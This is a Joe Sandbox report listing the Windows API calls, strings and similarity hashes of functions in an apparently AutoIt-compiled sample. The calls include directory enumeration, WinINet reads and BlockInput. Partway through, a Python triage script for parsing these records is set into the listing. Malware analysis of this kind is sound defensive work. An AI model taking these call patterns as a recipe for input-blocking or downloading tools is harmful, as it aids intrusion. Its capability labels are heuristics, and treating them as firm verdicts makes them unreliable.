                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                      • Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 901099227-0
                                      • Opcode ID: 7d83386364fee86b1bb5a775f15a6a1b92d0351d5f8e9f745437605a42ea8d7c
                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                      • Opcode Fuzzy Hash: 7d83386364fee86b1bb5a775f15a6a1b92d0351d5f8e9f745437605a42ea8d7c
                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
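The records above (a FindFirstFileW/FindNextFileW directory walk, a WinINet InternetQueryDataAvailable/InternetReadFile loop, BlockInput(TRUE), and a SetUnhandledExceptionFilter call) are the entries a triage analyst wants pulled out of a function listing this long, and the same layout repeats for every function on the page. The Python below is an added example, not Joe Sandbox code: it parses records in this layout (an "APIs" line opens each record; call lines carry a `ref:` address; the Similarity keys follow), decides what a function does from its direct calls only, so a GetLastError inside a subcall is not charged to the caller, checks that BlockInput is actually called with TRUE rather than FALSE, and counts records sharing an Opcode ID once. The capability labels are the example's own, the `$` separator is read off the String ID values on this page, and the sample text is a cut-down copy of the four records above. The SetUnhandledExceptionFilter label is informational: MSVC CRT startup installs such a filter in benign binaries as well.

```python
"""Triage helper for the per-function "Similarity" records in a Joe Sandbox
report (the layout on this page). Added example, not Joe Sandbox's own code."""
import re
from collections import namedtuple

# Constructed input: four records from the listing above, cut down to the lines
# the parser consumes (API calls with ref: addresses plus the Similarity keys).
SAMPLE = """\
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• Opcode ID: 7d83386364fee86b1bb5a775f15a6a1b92d0351d5f8e9f745437605a42ea8d7c
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
Similarity
• API ID: ExceptionFilterUnhandled
• Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
"""

# "• Name.MODULE(args), ref: ADDR"; subcall lines carry the callee address, and
# lines such as "GetLastError.KERNEL32 ref: ..." have no argument list at all.
API_LINE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)\."
    r"(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_LINE = re.compile(
    r"^\s*•\s+(?P<key>API ID|String ID|Opcode ID|Instruction ID|Opcode Fuzzy Hash|"
    r"Instruction Fuzzy Hash):\s?(?P<val>.*?)\s*$")
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")  # subcall_of: callee or None

class Record:
    def __init__(self):
        self.calls, self.fields = [], {}

    def direct_apis(self):
        """APIs the function itself calls; subcall entries are left out so a
        helper's GetLastError is not attributed to every caller."""
        return {c.name for c in self.calls if c.subcall_of is None}

    def first_ref(self):
        return self.calls[0].ref if self.calls else ""

def parse_records(text):
    """A record starts at a bare 'APIs' line; unrelated lines are skipped."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Record()
            records.append(current)
        elif current is None:
            continue
        elif (m := API_LINE.match(line)):
            current.calls.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
        elif (m := FIELD_LINE.match(line)):
            current.fields[m["key"]] = m["val"]
    return records

def split_ids(value):
    """The report joins several strings with '$' (e.g. '$AutoIt v3$DISPLAY$static')."""
    return [s for s in value.split("$") if s]

def _block_input_true(rec):
    # BlockInput(TRUE) blocks input; BlockInput(FALSE) only lifts an earlier block.
    return any(c.name == "BlockInput" and c.args.split(",")[0] == "00000001" for c in rec.calls)

# (label, direct APIs that must all be present, optional extra check)
CAPABILITIES = [
    ("enumerates a directory (FindFirstFileW/FindNextFileW loop)", {"FindFirstFileW", "FindNextFileW"}, None),
    ("reads a remote resource over WinINet (InternetReadFile)", {"InternetReadFile"}, None),
    ("blocks keyboard and mouse input (BlockInput(TRUE))", {"BlockInput"}, _block_input_true),
    ("installs an unhandled-exception filter (CRT startup; also an anti-debug trick)",
     {"SetUnhandledExceptionFilter"}, None),
]

def capabilities(rec):
    direct = rec.direct_apis()
    return [label for label, needed, check in CAPABILITIES if needed <= direct and (check is None or check(rec))]

def triage(text):
    """Capability label -> first call-site address of each function showing it;
    records sharing an Opcode ID (same code) are counted once."""
    seen, out = set(), {}
    for rec in parse_records(text):
        key = rec.fields.get("Opcode ID") or rec.first_ref()
        if key not in seen:
            seen.add(key)
            for label in capabilities(rec):
                out.setdefault(label, []).append(rec.first_ref())
    return out
```

Pointing `triage()` at the text of the whole function listing gives one line per capability with the call-site addresses to open in the disassembly; the direct-call rule and the BlockInput argument check are what keep the output from flagging every caller of a shared error-handling helper or a function that merely releases an input block.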
                                      APIs
                                      • DeleteObject.GDI32(?), ref: 0045953B
                                      • DeleteObject.GDI32(?), ref: 00459551
                                      • DestroyWindow.USER32(?), ref: 00459563
                                      • GetDesktopWindow.USER32 ref: 00459581
                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                      • _wcslen.LIBCMT ref: 00459916
                                      • _wcscpy.LIBCMT ref: 0045993A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                      • GetDC.USER32(00000000), ref: 004599FC
                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 4040870279-2373415609
                                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                      • SelectObject.GDI32(?,?), ref: 00441874
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                      • DeleteObject.GDI32(?), ref: 004418D5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                      • FillRect.USER32(?,?,?), ref: 00441970
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                      • String ID:
                                      • API String ID: 69173610-0
                                      • Opcode ID: 8d556d5a0fd18966a053139855cbc3485b5e0baa6df02477204c0b0fa9749797
                                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                      • Opcode Fuzzy Hash: 8d556d5a0fd18966a053139855cbc3485b5e0baa6df02477204c0b0fa9749797
                                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004590F2
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-3360698832
                                      • Opcode ID: f32331576ca5d7b6220a2beb2d028aab5ad6c6709b843e07dc5482f427f41384
                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                      • Opcode Fuzzy Hash: f32331576ca5d7b6220a2beb2d028aab5ad6c6709b843e07dc5482f427f41384
                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                      • SetCursor.USER32(00000000), ref: 0043075B
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                      • SetCursor.USER32(00000000), ref: 00430773
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                      • SetCursor.USER32(00000000), ref: 0043078B
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                      • SetCursor.USER32(00000000), ref: 004307A3
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                      • SetCursor.USER32(00000000), ref: 004307BB
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                      • SetCursor.USER32(00000000), ref: 004307D3
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                      • SetCursor.USER32(00000000), ref: 004307EB
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                      • SetCursor.USER32(00000000), ref: 00430803
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                      • SetCursor.USER32(00000000), ref: 0043081B
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                      • SetCursor.USER32(00000000), ref: 00430833
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                      • SetCursor.USER32(00000000), ref: 0043084B
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                      • SetCursor.USER32(00000000), ref: 00430863
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                      • SetCursor.USER32(00000000), ref: 0043087B
                                      • SetCursor.USER32(00000000), ref: 00430887
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                      • SetCursor.USER32(00000000), ref: 0043089F
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Cursor$Load
                                      • String ID:
                                      • API String ID: 1675784387-0
                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                      APIs
                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                      • GetSysColor.USER32(00000012), ref: 00430933
                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                      • GetSysColor.USER32(00000011), ref: 00430979
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
